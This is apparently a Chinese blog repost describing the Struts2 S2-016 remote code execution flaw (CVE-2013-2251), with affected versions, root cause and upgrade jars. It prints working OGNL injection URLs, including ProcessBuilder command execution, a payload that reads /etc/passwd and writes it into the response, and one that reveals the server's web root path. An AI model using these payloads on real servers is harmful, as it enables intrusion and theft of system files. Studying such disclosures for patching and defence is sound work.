Struts2再爆远程代码执行漏洞（S2-016）

时间 2019-11-11

标签 struts2 struts 远程代码执行漏洞 s2 栏目 Struts 繁體版

原文原文链接

Struts又爆远程代码执行漏洞了！在此次的漏洞中，攻击者能够经过操纵参数远程执行恶意代码。Struts 2.3.15.1以前的版本，参数action的值redirect以及redirectAction没有正确过滤，致使ognl代码执行。 html

描述 java

影响版本	 Struts 2.0.0 - Struts 2.3.15
报告者	 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号      CVE-2013-2251

漏洞证实 spring

参数会以OGNL表达式执行 express

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代码执行 apache

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

漏洞原理 app

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. ide

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. 网站

Apache官方地址 ui

国内网站受灾严重 this

如下仅供教学研究之用，严禁非法用途！

执行任意命令EXP，感谢X提供：

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆网站路径EXP，感谢h4ck0r提供：

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

升级struct2须要下列包

commons-lang3-3.1.jar

javassist-3.18.1-GA.jar

ognl-3.0.6.jar

struts2-core-2.3.16.jar

struts2-spring-plugin-2.3.16.jar

xwork-core-2.3.16.jar